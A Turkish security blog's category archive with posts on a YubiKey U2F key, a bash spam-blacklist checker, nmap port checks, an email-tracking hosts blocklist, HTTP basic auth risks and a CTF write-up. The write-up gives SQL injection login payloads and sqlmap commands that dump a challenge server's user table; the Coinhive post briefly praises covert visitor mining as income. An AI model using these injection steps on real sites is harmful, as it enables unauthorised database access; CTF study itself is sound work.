Kategori arşivi: Siber Güvenlik

Linux ve windows sistemler için temel güvenlik önlemleri ile birlikte gelişmiş güvenlik önemlemleri alma ve optimizasyon hakkında türkçe yazılar ve daha fazlası

Yubico FIDO U2F İlk Deneyimlerim

Bu yazımda sizlere geçtiğimiz günlerde twitter adresimden bahsetmiş olduğum. Yubico FIDO U2F fiziksel güvenlik aracını ve U2F nin çalışma mantığını ve U2F’in ne olduğunu sizlere kısaca bahsedeceğim.

yubico-gorsel-u2f-package

Nedir bu U2F ?

Universal 2nd Factor (U2F), akıllı kartlarda bulunan benzer güvenlik teknolojisine dayalı uzmanlaşmış USB veya NFC cihazlarını kullanarak iki faktörlü kimlik doğrulamayı güçlendiren ve basitleştiren açık bir kimlik doğrulama standardıdır.

yubico-gorsel-u2f-device

Başlangıçta Google ve Yubico tarafından NXP Semiconductors’ın katkılarıyla geliştirilmiş olsa da standart artık FIDO Birliği tarafından barındırılıyor.

U2F Güvenlik anahtarını hangi platformlar destekliyor?

U2F Güvenlik Anahtarları, sürüm 38’den beri Google Chrome ve Opera 40 sürümünden ayrıca Firefox 57 den beri tarayıcılar tarafından desteklenmektedir. U2F güvenlik anahtarları, Google, Dropbox, GitHub, GitLab gibi U2F protokolünü destekleyen çevrimiçi hizmetlerde ek bir iki adımlı doğrulama yöntemi olarak kullanılabilir ayrıca destekleyen yukarıdakiler dışında pek çok platform bulunmaktadır.

Firefox 57 ve üstü sürümler için firefoxda hali hazırda aktif gelmeyen bu özelliği about:config alanına giriş yaparak ve security.webauth.u2f değerini True olarak değiştirerek kullanmaya başlayabilirsiniz.

not: Bazı web siteleri sadece google chrome üzerinden gelen U2F isteklerini kabul etmektedir. Bu durumun kısa sürede değişeceğine inanıyorum.

Yubico FIDO U2F Nasıl Çalışır

yubico-u2f-calisma-mantigi

U2F tasdikinin amacı, bir U2F güvenen tarafın (bir web sitesi veya hizmet) bir U2F kimlik doğrulayıcısının doğruluğunu doğrulayabilmesi ve böylece onun tasdik sertifikasına güvenebilmesi için yalnızca bir mekanizma sağlamaktır. Güvenen bir taraf, YubiKey gibi bir kimlik doğrulayıcı hakkında bilgi bulmak için onay belgesine sorar. Sorulan bilgi, kimlik doğrulayıcının satıcısını, aygıt türünü ve güvenlik özelliklerini (örneğin, güvenli öğe tabanlı bir aygıt) içerebilir.

Onaylama bilgilerinin özgünlüğü, belirli bir geçerlilik süresi olan dijital bir imza ile garanti edilir.

yubico-fido-u2f-cihaz-boyutu

Bir cihazın güvenilirliğinin kanıtı olmasının yanı sıra, kimlik doğrulama sertifikası da hangi tarafların kullanabileceğini belirlemek için kullanılabilir. Örneğin, bir bankacılık sitesi kullanıcılarını kendi U2F cihazlarını iki faktörlü kimlik doğrulaması için kullanabilmelerini isteyebilir, ancak yalnızca kullanıcıların belirli onaylı üreticilerin cihazlarını kullanmasına da izin verebilir.

Bununla birlikte, U2F’yi ne tür bir aygıt ya da istemci tarafı yazılımı kullandığını belirlemek için herhangi bir gereklilik yoktur – güvenen taraf ya da hizmet, herhangi bir onay belgesinin türünü ya da belirli bir türünü kabul etmeyi kararlaştırabilir.

Yubico U2F deneyimleme fırsatı

14 Kasım 2017 tarihinde internet üzerinden satın alma işlemini gerçekleştirdim. İsveç’ten türkiyeye normal posta ile gelişi yaklaşık olarak 15 gün sürdü ufak bir zarf içerisinde 2 adet U2F cihazı tarafıma böylelikle ulaşmış oldu.

Geldiğinde direk cihazları denemek için destekleyen bir platforma uğradım bunun için Github tercih ettim özellikle Firefox 57‘yi desteklediği için tarayıcıyıda test etme imkanım oldu.

Bir e-imza’yı anımsatsada java gerektirmeyen tarayıcı tarafında sorunsuz çalışan sizi ek külfetlerden kurtaran bir cihaz.

Özellikle platform bağımsız bir şekilde sadece tarayıcı ile kullanılabiliyor olmasıda cihazı bir adım öne taşıyor.

Sitenin IP Adresinin SPAM Kontrolünü Yaptın mı?

Projen var siteni kuruyorsun firmanda sana çok güzel bir ip adresi verdi peki sen bu ip adresinin geçerlilik durumunu kontrol ettin mi ?

Genelde herkes yeni verilen ip adresinin spama düşmüş olma ihtimalini düşünmez hatta kimi zaman kullanılmamış ip veriyorlardır abi diyen bile duydum.

Lakin günümüzde ipv4 kalmadığı için bu söylenenlerinde pek bi geçerliliği olmuyor. Firmalar ip adreslerini müşterilerine her ne kadar temiz bir şekilde vermiş olsada kişi kirletip spama sokabiliyor günümüzde spam özellikle tehlikelide bir durum

Bu duruma Netinternet’den Osman Makal bey el atmış durumda ve aşağıdaki güzel betiği hazırlamış bende çıkan sorunları düzeltip yeni verisyon olarak yayınlıyorum.

#!/bin/bash
# Mirror amaci ile https://github.com/netinternet/ adresinden alinmis ve guncellenmisir.
if [[ $1 =~ ^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$ ]]; then
        ip=$1
        tersip=$(echo $ip| awk -F'.' 'OFS="." {print $4,$3,$2,$1}')
else
        echo "IP HATALI!"
        exit 0
fi
# Duzenlemek serbest
rbllistesi="bl.spamcop.net cbl.abuseat.org b.barracudacentral.org dnsbl.invaluement.com ddnsbl.internetdefensesystems.com dnsbl.sorbs.net http.dnsbl.sorbs.net dul.dnsbl.sorbs.net misc.dnsbl.sorbs.net smtp.dnsbl.sorbs.net socks.dnsbl.sorbs.net spam.dnsbl.sorbs.net web.dnsbl.sorbs.net zombie.dnsbl.sorbs.net dnsbl-1.uceprotect.net dnsbl-2.uceprotect.net dnsbl-3.uceprotect.net pbl.spamhaus.org sbl.spamhaus.org xbl.spamhaus.org zen.spamhaus.org bl.spamcannibal.org psbl.surriel.com ubl.unsubscore.com dnsbl.njabl.org combined.njabl.org rbl.spamlab.com dnsbl.ahbl.org ircbl.ahbl.org dyna.spamrats.com noptr.spamrats.com spam.spamrats.com cbl.anti-spam.org.cn cdl.anti-spam.org.cn dnsbl.inps.de drone.abuse.ch httpbl.abuse.ch dul.ru korea.services.net short.rbl.jp virus.rbl.jp spamrbl.imp.ch wormrbl.imp.ch virbl.bit.nl rbl.suresupport.com dsn.rfc-ignorant.org ips.backscatterer.org spamguard.leadmon.net opm.tornevall.org netblock.pedantic.org black.uribl.com grey.uribl.com multi.surbl.org ix.dnsbl.manitu.net tor.dan.me.uk rbl.efnetrbl.org relays.mail-abuse.org blackholes.mail-abuse.org rbl-plus.mail-abuse.org dnsbl.dronebl.org access.redhawk.org db.wpbl.info rbl.interserver.net query.senderbase.org bogons.cymru.com"
for rbl in $rbllistesi;do
    sonuc=$(dig +short $tersip.$rbl)
    #Sonuc zero degil ise IP listedir.
    if [ ! -z "$sonuc" ];then
        echo "$ip adresi $rbl listesinde sonuc: $sonuc"
    fi
done

Spamsız bol güzel günler dilerim.

No Coin ile Tarayıcıda Kripto Para Madenciliğini Durdurun

İnternette gezinirken çok güzel ve bir okadarda tehlikeli bir site ile karşılaştım. Coinhive olarak adlandırılan bu site, bilgisayar kaynaklarını kullanarak web sitenize gelen ziyaretçilerin kripto para madenciliği yapmasına imkan tanır. Tabi gelen ziyaretçi kendisi için değil site sahibi için CPU gücünü harcamaktadır.

İçerikten para kazanmak yerine böyle bir yöntemi görmek beni hem şaşırttı hem mutlu etti.

Coinhive size yeniden yönlendirme yapmak ve kazma işlemini başlatacak bir kısa link hizmetini sunar, ardından doğrulama gerektiren bir captchayı ve buna bağlı olarak kazma işlemini başlatacak API yi siz verir. Gerekli olan dokümanlarıda sitesinde bulabilirsiniz.

coin-hive-gorsel1

Kullanıcılar siteyi gezerken bu servisi ara ara çalıştırmak sizin açınızdan oldukça yararlı Manero adında kazılan bu sanal para ilede alışverişlerinizi yapabilirsiniz. Üstelik ciddi anlamda güzel gelirler elde edebilirsiniz.

Tabi gelir elde edilirken tedbiri elden bırakmamak lazım;

NoCoin, Hızla yazılan ve şimdilik sadece kara listeye siteleri engelliyor. İsterseniz bu engelleri kaldırabilirsiniz. Bu eklentiyi yazan amcamız gelecekte büyüyebilecek bu hizmetlerin güncellenmiş bir listesiyle önüne geçebilmek.

no-cointest

Ancak bazı siteler, kullanıcı oturumunun tamamı boyunca hizmeti kötüye kullanma yöntemleri bulmaya geçtiler. Özellikle internette yayınlanan haberlere göre vakti zamanında bu yöntem ile ThePirateBay kendisine güzel bir gelir elde etmiş. Biz istiyoruz ki kaynaklarınız bilinçsizce ve izniniz olmadan kullanılmasın.

NMAP İle Port Durumlarını Kontrol Etme

Nmap, ağ operasyonları için klasik olmakla beraber bir İsviçre çakısıdır. Herhangi bir bilgisayardaki belirli bir bağlantı noktasının açık olup olmadığını kontrol etmek zorunda kaldığımız durumlar olabilir. Bu tip durumlarda teşhis Nmap ile yapmak gerekebilir. Hatta yapsanız daha iyi bile olur

İlk önce nmap kurmamız gerekiyor tabi ki sudo apt install nmap komut ile kuruyoruz.

80 Portunun Mertcan adlı bilgisayardaki durumunun kontrol edilmesi

nmap -p 80 Mertcan

Çıktı aşağıdaki gibi olmalı

Starting Nmap 7.60 ( http://nmap.org ) at 2017-09-29 14:05 Turkey Standard Time
Nmap scan report for medusa (192.168.0.22)
Host is up (0.00035s latency).
PORT     STATE SERVICE
9010/tcp open  sdr
 
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

Verilen aralıklar arasındaki bağlantı noktalarının kontrol edilmesi

nmap -p 0-10 Mertcan

Örnek çıktımız

Starting Nmap 7.60 ( http://nmap.org ) at 2017-09-29 14:08 Turkey Standard Time
Nmap scan report for medusa (192.168.0.22)
Host is up (0.00027s latency).
PORT   STATE  SERVICE
0/tcp  closed unknown
1/tcp  closed tcpmux
2/tcp  closed compressnet
3/tcp  closed compressnet
4/tcp  closed unknown
5/tcp  closed unknown
6/tcp  closed unknown
7/tcp  closed echo
8/tcp  closed unknown
9/tcp  closed discard
10/tcp closed unknown
 
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

Daha ne olsun arkadaşlar güzel bir şekilde portların durumunu kontrol ettik online siteler dışında bunu kullanabilirsiniz local de test etmek için güzel yöntem.

Port tespiti dışında detaylı taramalar yapmak isterseniz NMAP Kullanımı adlı yazıya göz atabilirsiniz.

Biri Bizi Gözetliyor E-Mail Tracking

Çok sayıda şirket ve posta hizmetleri sağlayan kurumlar kişiselleştirilmiş bir url içeren postalarına küçük görünmez görüntüler koyuyor. Postalarını her açtığınızda, bu resim sunucudan yüklenir ve şirket size gönderilen bu postanın açıldığını bilir. Örnek olarak şu şekilde

Örnek 1

 <img src="http://tracker.com/trk?yourid=<some_random_string>" 
         width="1" 
         height="1" 
         style="display:none !important;" 
         alt="">

Örnek 2

<img src=3D"https://mailing.g2a.com/open.html?x=3Da62e&m=3DVh=
&mc=3Df&s=3DlytFt&u=3Dl&y=3D9&" 
		width=3D"0" 
		height=3D"0" 
		border=3D"0" />

Spam maillerin sana ulaştığını bu firmalar işte bu şekilde anlar sen maili açarsın çünkü ney olup bittiğini anlamak için – ve daha fazla mail göndermek için güzel bir başlangıç yakalamış olunur.

Bunu nasıl önleyeyebiliriz ?

Programların bağlanmak istediği yerleri gösteren araçlar vardır. Ancak çoğu zaman bu uygulamalar ücretlidir. Listede henüz bulunmayan yeni bir urlyi bu uygulamalar aracılığı ile keşfede bilirsiniz.

Bununla birlikte, izlemeyi engellemenin en kolay ve en kolay yolu, bilgisayarınızda bulunanhosts dosyanıza URL’ler eklemenizdir. Bu, sisteminizin izleme bağlantılarını 0.0.0.0 yönlendirmenize yardımcı olacak ve bu bağlantılardan gelecek isteklere sisteminiz kulak asmayacaktır.

0.0.0.0     track.mixmax.com
0.0.0.0     securepubads.g.doubleclick.net
0.0.0.0     click.mailer.atlassian.com
0.0.0.0     marketing.intercom-mail-200.com 
0.0.0.0     mailchimp.com
0.0.0.0     list-manage.com
0.0.0.0     cl.exct.net
0.0.0.0     emailtracking.azure.com
0.0.0.0     trker1.azalead.com
0.0.0.0     mkto-k0023.com
0.0.0.0     maileon.com
0.0.0.0     xqueue.de
0.0.0.0     t.yesware.com
0.0.0.0     track.getsidekick.com
0.0.0.0     t.sigopn01.com
0.0.0.0     t.senaluno.com
0.0.0.0     t.senaldos.com
0.0.0.0     t.senaltres.com
0.0.0.0     t.senalquatro.com
0.0.0.0     t.senalcinco.com
0.0.0.0     t.sigopn02.com
0.0.0.0     t.sigopn03.com
0.0.0.0     t.sigopn04.com
0.0.0.0     t.sigopn05.com
0.0.0.0     t.signauxun.com
0.0.0.0     t.signauxdeux.com
0.0.0.0     t.signauxtrois.com
0.0.0.0     t.signauxquatre.com
0.0.0.0     t.signauxcinq.com
0.0.0.0     t.signauxsix.com
0.0.0.0     t.signauxsept.com
0.0.0.0     t.signauxhuit.com
0.0.0.0     t.signauxdix.com
0.0.0.0     t.signauxneuf.com
0.0.0.0     t.signaleuna.com
0.0.0.0     t.signaledue.com
0.0.0.0     t.signaletre.com
0.0.0.0     t.signalequattro.com
0.0.0.0     t.signalecinque.com
0.0.0.0     t.strk01.email
0.0.0.0     t.strk02.email
0.0.0.0     t.strk03.email
0.0.0.0     t.strk04.email
0.0.0.0     t.strk05.email
0.0.0.0     t.strk06.email
0.0.0.0     t.strk07.email
0.0.0.0     t.strk08.email
0.0.0.0     t.strk09.email
0.0.0.0     t.strk10.email
0.0.0.0     t.strk11.email
0.0.0.0     t.strk12.email
0.0.0.0     t.strk13.email
0.0.0.0     t.sidekickopen01.com
0.0.0.0     t.sidekickopen02.com
0.0.0.0     t.sidekickopen03.com
0.0.0.0     t.sidekickopen04.com
0.0.0.0     t.sidekickopen05.com
0.0.0.0     t.sidekickopen06.com
0.0.0.0     t.sidekickopen07.com
0.0.0.0     t.sidekickopen08.com
0.0.0.0     t.sidekickopen09.com
0.0.0.0     t.sidekickopen10.com
0.0.0.0     t.sidekickopen11.com
0.0.0.0     t.sidekickopen12.com
0.0.0.0     mailtrack.io
0.0.0.0     mailstat.us
0.0.0.0     go.toutapp.com
0.0.0.0     app.outreach.io
0.0.0.0     tracking.cirrusinsight.com
0.0.0.0     app.yesware.com
0.0.0.0     t.yesware.com
0.0.0.0     mailfoogae.appspot.com
0.0.0.0     launchbit.com
0.0.0.0     cmail1.com
0.0.0.0     infusionsoft.com
0.0.0.0     via.intercom.io
0.0.0.0     mandrillapp.com
0.0.0.0     t.hsms06.com
0.0.0.0     app.relateiq.com
0.0.0.0     go.rjmetrics.com
0.0.0.0     web.frontapp.com
0.0.0.0     sendgrid.net
0.0.0.0     icptrack.com
0.0.0.0     click.icptrack.com
0.0.0.0     bl-1.com
0.0.0.0     links.mixmax.com
0.0.0.0     app.mixmax.com
0.0.0.0     ping.answerbook.com
0.0.0.0     constantcontact.com
0.0.0.0     google-analytics.com
0.0.0.0     mkt4477.com
0.0.0.0     api.mixpanel.com
0.0.0.0     mixpanel.com
0.0.0.0     list-manage.com
0.0.0.0     list-manage1.com
0.0.0.0     o1.mailing.sh.com.tr

Bu şekilde bazılarını engelleyebilirsiniz. Ancak bu hizmeti veren oldukça fazla firma var bunların her birinin url adreslerini tek tek tespit etmek ve engellemek gerekiyor ki e-postalarınızın açılıp açılmadığını göremesinler. Spam atılan her bir mesaj o mail adresinin kullanılıp kullanılmadığını anlamak için bile gönderiliyor olabilir. Bunu aklınızın bir köşesine not edin.

Bu iş için geliştirilmiş bir adet tarayıcı eklentisi mevcut PixelBlock bu eklenti aracılığı ile mailler içerisinde eğer yukarda bahsi geçen bir içerik varsa hemen engelleyecek ve otomatik olarak size bildirim gönderecek

Yeni bir takım url tespit ederseniz lütfen Pull Request isteği ile göndermeyi unutmayın. Peki en basiti bu url bilgilerini veya izlendiğimizi nasıl anlayacağız.

Bunun dışında nasıl yardım edebilirim?

Okuduğunuz mail bir şirket, kurum veya kuruluştan birisi tarafından bir e-posta alırsanız, kaynağa (*) bakın ve yukarıdaki kod gibi bir şeyler bulmaya çalışın. Genellikle postanın sonunda bulunur.

Aynı şekilde thunderbird kullanıyorsanız mailin kaynağına bakın kaynakta en sonra click ve(veya) open şeklinde yönlendirmelerde görebilirsiniz. Bu yönlendirmelere karşılık gelen domain bilgilerini bize gönderebilirsiniz.

HTTP üzerinden Temel Kimlik Doğrulama kullanmayın

Temel kimlik doğrulama, uygulamanın basitliği ve kolaylığı nedeniyle son derece popüler bir kimlik doğrulama aracıdır. Maalesef, HTTP üzerinden aynı zamanda, kişilerin kimlik doğrulamalarını sağlamak güzel bir yöntem değildir! Temel kimlik doğrulama, istemcilerin kullanıcı adı ve parola kimlik bilgilerini iletmek için kimlik doğrulama HTTP başlık bilgisini(header) kullanır. İstemci verilen kullanıcı adını ve parolayı alır, base64 olarak her ikisini de kodlar ve bir sunucuya istekte bulunurken bunları HTTP başlık bilgisine(header) ekler. Buraya kadar bir sorun yok hatta bu durum size normal bile geliyor olabilir.

GET /admin-panel HTTP/1.1
Authentication: Basic ZGVtbzpleGFtcGxl
Host: mertcangokgoz.com

Sunucu, doğrulama yapmak için kullanıcı adı ve parolanızı alır ve kimlik doğrulama başlık bilgisini(header) basitçe base64 halini çözer. Sonuç olarak kişi benim doküman sistemime ulaşır. Maalesef, yukarıda belirttiğim gibi temel kimlik doğrulama HTTP protokolü üzerinden hiçbir zaman kullanılmamalıdır.

HTTP protokolü, daha akıllı kardeşi olan HTTPS’den farklı olarak şifrelenmez. Bu da internette bulunan herkesin gönderdiğiniz her ne olursa olsun görebildiğini varsayabileceğimiz anlamına gelir. Doküman koleksiyonum hassas bilgi değilken, isteği yaptığımda kimlik doğrulama başlığında benim kimlik bilgilerimi göndermiş oldum; bu da benim kimlik bilgilerimi kötü niyetli bilgisayar korsanlarına veriyor olabileceğim anlamına geliyor, çünkü şifrelenmemiş istek ile yapılan bu işlem oldukça kolay bir şekilde istismar edilebilir.

İster aynı kafede oturuyor olun isterseniz dünyanın bir ucunda olun, kimlik bilgileriniz HTTPS dışında tamamen görülebileceği gibi kolayca parlolalarınız çözülecektir Base64 bir şifreleme aracı kesinlikle değildir! Bu nedenle HTTP üzerinden temel kimlik doğrulamasını asla kullanmamalısınız! temel kimlik doğrulama yalnızca HTTPS üzerinden düşünülmeli ve kullanılmalıdır.

Peki HTTPS üzerinden kullanılan temel kimlik doğrulama işlemi yeterlimidir ?

Aslında hayır. Ama bu durum gerçekten sitenizin neye ve ne kadar güvenli olması durumuna bağlıdır. Parola her istek için tekrar tekrar gönderilebilir. Parola, web tarayıcısı tarafından, en azından işlem uzunluğu boyunca ön belleğe alınır. Buda sunucuya yapılan başka herhangi bir istekle sessizce yeniden kullanılabilir olabileceği anlamına gelir.

HTTPS kullanılması durumu bunlardan sadece bir tanesini çözer. Yani web sunucusundan istek gelene kadar korur herhangi bir iç yönlendirme, sunucu log vb. alanlarda parolalarınız düz metin olarak gözükür.

Siberyildiz Soru ve Cevaplar

Merhaba arkadaşlar bilindiği gibi USOM aracılığı ile bir CTF düzenlendi ve bizde buna katılma ihtiyacı duyduk. Bizler ne etik hackerız nede bu alanda çalışıyoruz. Biz sadece programlama ve birtakım bilgiler ile CTF’ler de neler yapabileceğimize bakıyoruz.

CTF başladığında haliyle siteye girip soruları çözemedik bunda en büyük etken yarışma başladığında kurumun hiçbir şekilde Anti-ddos araçları ile siteyi korumamış olması ayrıca sistemin düzgün çalışmaması neyse her yerde olabilir vs deyip birkaç soruya girebildik ve çözmeye başladık

Ancak belirtmek istiyorum. Oldukça fazla bir şekilde cevap paylaşımı ve çoklu grup kafası yüzünden ciddi anlamda geçerliliği sorgulanması gerekiyor üstelik bu yarışma yaklaşık 6 Saat kadar bir süre saldırı kaynaklı kesintiye uğradı ve bizde dahil cevaplarımızı giremedik

Sisteme giriş yaptığımızda ise pek çok gurubun yüksek puanlara geçmiş olduğunu gördük. İnsanlarda haklı olarak twitter hesaplarından tepkide bulundular.

Soru 1

“İyi bak “ Bu soruda ilk olarak size bir adet resim veriyor ve bu resimden yola çıkarak cevabı bulmanız isteniyor. Resmi google aracılığı ile arattığımızda para ile alınmış olabileceğini düşündük ve biraz araştırma yaptık daha sonra basitten zora gidiyordur diye bi exiftool aracılığı ile comment ve copyright baktık ama soruda “iyi bak” dediği için daha sonrasında resme odaklandık

soru1siberyildiz

Her neyse resmin boş olduğunu anladıktan sonra curl atıp bakalım dedik birde ne görelim FLAG olarak orada bulunuyordu

soru1cevap
335286429afb2a2344079fe68764a1e0

Soru 2

“Bakalım ne kadar iyisin?” Bu soruda ise basit bir login ekranı geliyor karşımıza ne kadar iyisin diyor sonrada bize ilk başta ekip olarak biz bi xss ya da sql inj deneriz çünkü basitten zora gitmek gerekir biraz kurcaladıktan sonra altta yazan mesaja odaklandık kullanıcı adını bulmamız bu sayede zor olmadı 🙂

soru2siberyildiz

Kullanıcı adı: Yonetici

Şifre: 1’or’1’=’1

Olarak sisteme giriş yaptık cevabı deli gibi sitede aradık hatta giriş yaptın bölümündeki değerleri deneyen arkadaşlarımız bile oldu bu soruyu uzun süre yapamadık siteye yapılan ddos saldırıları ve kesintiler aslında bu konuda başımızı baya ağrıttı kimi zaman soruların alanlarına da ulaşamadık her neyse

Burp suiteyi browser ile beraber çalışacak hale getirin( burp suite -> Proxy -> Options(burada 127.0.0.1:8080 var ve tikli ise)
browser(iceweasel) -> preferences -> advanced options -> Connection -> Manual Proxy Connection HTTP Proxy 127.0.0.1 Port 8080 yapın kaydedin.

Burpta intercept off olarak ayarlayın.
Iceweaselda açın.

Sayfa yüklendikten sonra burpta intercept ON yapın.

Kullanıcı adı: Yonetici

Şifre: ‘or ‘1’=’1

Olarak yollayın.

Burp RAW sekmesinde bir post data yakalamış olacaktır.


POST /fc00914149de9f33c30cf0164ec4db95/ HTTP/1.1
Host: 85.111.95.37
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 
Cookie: PHPSESSID=h2041ov1n3ukbfqjmlc0pu7657
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

kullaniciadi=Yonetici&parola=%27or%271%27%3D%271

Ve bu datayı kopyalayın sql2.txt olarak Root Home içersine kayıt edin. Yeni terminal açın sqlmap -r sql2.txt -p parola //yazın password kısımının sql injectiona açık olduğunu bulacaktır. Çıkan sorulara yes deyin database in mySQL olduğunu bulacaktır. Olaylar buradan sonra başlayacak

database adını bulacaksınız. 2 adet database buluyor teki information_sc bunu geçin klasik hepsinde olan diğerdir diğeri ise bizim aradığımız

Adı: web2

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --dbs

Tabloları çekmek için

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --tables -D web2

kullanicilar diye tek bir tablo bulucak.

Kolonları çekmek için

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --columns-D web2 -T kullanicilar

Bunun sonucunda aşağıdaki gibi bir sonuç çıkacak

id int(255)
kullaniciadi varchar(255)
parola int(255)

Kolonlardaki verileri çekmek için

sqlmap -u "http://85.111.95.37/fc00914149de9f33c30cf0164ec4db95" --data="kullaniciadi=Yonetici&parola='or '1'='1" --dump -D web2 -T kullanicilar

2 adet Kullanıcı bulucak teki Yonetici diğerinin adı “FLAG:” FLAG kullanıcısının parolası

f4aa0edc033b9dfcc676c33420996789

Kaynak: Alpcan ONARAN


Soru 3

Yetkili bir kullanıcı ile giriş yapman lazım. Sorusuna gelelim bu soruda ise sistemde zaten hali hazırda giriş yapmış olduğumuzu biliyoruz. Ancak bize daha yetkilisini bulmamızı söylüyor. Ve sayfa ilk giriş yaptığımızda bize çerez olarak

isAdmin=cfcd208495d565ef66e7dff9f98764da

Yukarıdaki yükleniyor hemen ardından ise çıkış yaptığımızda bu değeri sistemden siliyor. Biz bu değeri bir decode edelim dedik karşımıza 0 çıktı cevap haliyle bu olamazdı


Soru 4

“Elimizde bir flash bellek var, içerisindeki resimlerden biri bize lazım.” adlı sorumuza geldi sıra buradada bize verdiği dosya sözde bir disk imajı

ef2a36ae56f254dd6adf716dffc84264: DOS/MBR boot sector, code offset 0x52+2, OEM-ID "NTFS    ", sectors/cluster 8, Media descriptor 0xf8, sectors/track 62, heads 247, hidden sectors 2048, dos < 4.0 BootSector (0x80), FAT (1Y bit by descriptor); NTFS, sectors/track 62, sectors 102399, $MFT start cluster 4, $MFTMirror start cluster 6399, bytes/RecordSegment 2^(-1*246), clusters/index block 1, serial number 013e61d99342ea2e1; contains Microsoft Windows XP/VISTA bootloader BOOTMGR

Buraya kadar herşey normal şimdi sıra dosyaya binwalk ile bakmaya içerisinde neyin olup bittiğini görebileceğiz bu sayede

binwalk ef2a36ae56f254dd6adf716dffc84264 > dump.txt

Dosya içerisinde birden fazla PDF ve Resim olduğunu görüyoruz. Şimdi bunları dd ile tek tek çıkartmaya geldi

dd if=ef2a36ae56f254dd6adf716dffc84264 of=new.jpeg skip=14433399 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new2.jpeg skip=14516838 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new3.jpeg skip=28406368 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new4.jpeg skip=29052314 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new5.jpeg skip=29241403 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new6.jpeg skip=33026056 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new7.jpeg skip=33062920 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new8.jpeg skip=33062950 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new9.tiff skip=33062950 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new0.jpeg skip=45166530 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new11.jpeg skip=49163867 bs=1
dd if=ef2a36ae56f254dd6adf716dffc84264 of=new12.jpeg skip=49279925 bs=1

Çıkarttığımız resimler içerisinde benim dikkatimi en fazla çeken usomun logosunun bulunduğu ve resim headeri bozuk olandı

Herhangi bir hex aracı ile resmi açıyorsunuz ve header bilgisini düzeltiyorsunuz uzun uzun anlatmayacağım mantığını şu site aracılığı ile öğrenebilirsiniz. Rebuilding an Image Header

Daha sonra resmi düzelttikten hemen sonra herhangi bir exif aracı ile ki ben “exiftool” seçtim bilgilere bakıyoruz.

mertcan@0x2e88ce4:~/Desktop$ exiftool exifusom.png
ExifTool Version Number         : 10.37
File Name                       : exifusom.png
Directory                       : .
File Size                       : 87 kB
File Modification Date/Time     : 2017:01:21 14:23:12+03:00
File Access Date/Time           : 2017:01:21 14:23:20+03:00
File Inode Change Date/Time     : 2017:01:21 14:23:26+03:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 962
Image Height                    : 421
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Exif Byte Order                 : Little-endian (Intel, II)
Copyright                       : D0sy4kurt4rmA_B1ziM-1$iM1Z
Thumbnail Offset                : 94
Thumbnail Length                : 3755
Pixels Per Unit X               : 11811
Pixels Per Unit Y               : 11811
Pixel Units                     : meters
Software                        : Adobe ImageReady
Warning                         : Truncated PNG image
Image Size                      : 962x421
Megapixels                      : 0.405
Thumbnail Image                 : (Binary data 3755 bytes, use -b option to extract)

Ve sonunda bayrağımıza ulaştık

Copyright                       : D0sy4kurt4rmA_B1ziM-1$iM1Z

Değerin md5 hash halini alıyoruz ve işlemimiz burada bitiyor.

0679ce1ac69b580a695fc8308bfd2116

Soru 5

“Parolayı bul ve bize gönder !” başlıklı bu soruda ise bize site içerisinde kaynakta gözükecek şekilde obfuscate edilmiş yani karıştırılmış bir JS kodu verilmiş ve bizden bunu çözmemiz isteniyor. İlk olarak kodu düzeltelim

$(document)['ready'](function() {
    $('#loginform')['submit'](function(_0x34b0x1) {
        _0x34b0x1['preventDefault']();
        var _0x34b0x2 = true;
        var _0x34b0x3 = $('input[name="username"]')['val']();
        var _0x34b0x4 = $('input[name="password"]')['val']();
        var _0x34b0x5 = new Array('b5', '1c44', 'c6', '24c1', 'e6', '2b93', 'da', '1fd4', 'b1');
        if (CryptoJS.MD5(_0x34b0x3).toString() === '2dfa843b02427819d8bdf8271bb84a3c' && _0x34b0x4['length'] === (18 / 3 + 6 - 3)) {
            for (i = 0; i < _0x34b0x3['length']; i++) {
                if (i % 2 === 0) {
                    if (((_0x34b0x3['charAt'](i)['charCodeAt'](0)) + (_0x34b0x4['charAt'](i)['charCodeAt'](0))).toString(16) !== _0x34b0x5[i]) {
                        _0x34b0x2 = false;
                        break;
                    }
                } else {
                    if (_0x34b0x5[i] !== ((_0x34b0x3['charAt'](i)['charCodeAt'](0)) * (_0x34b0x4['charAt'](i)['charCodeAt'](0))).toString(16)) {
                        _0x34b0x2 = false;
                        break;
                    }
                }
            };
            if (_0x34b0x2) {
                alert('Bau015Faru0131lu0131 iu015Flem')
            } else {
                alert('Hatalu0131 iu015Flem')
            };
        } else {
            alert('Kullanu0131cu0131 adu0131 veya u015Fifre yanlu0131u015F')
        };
    })
});

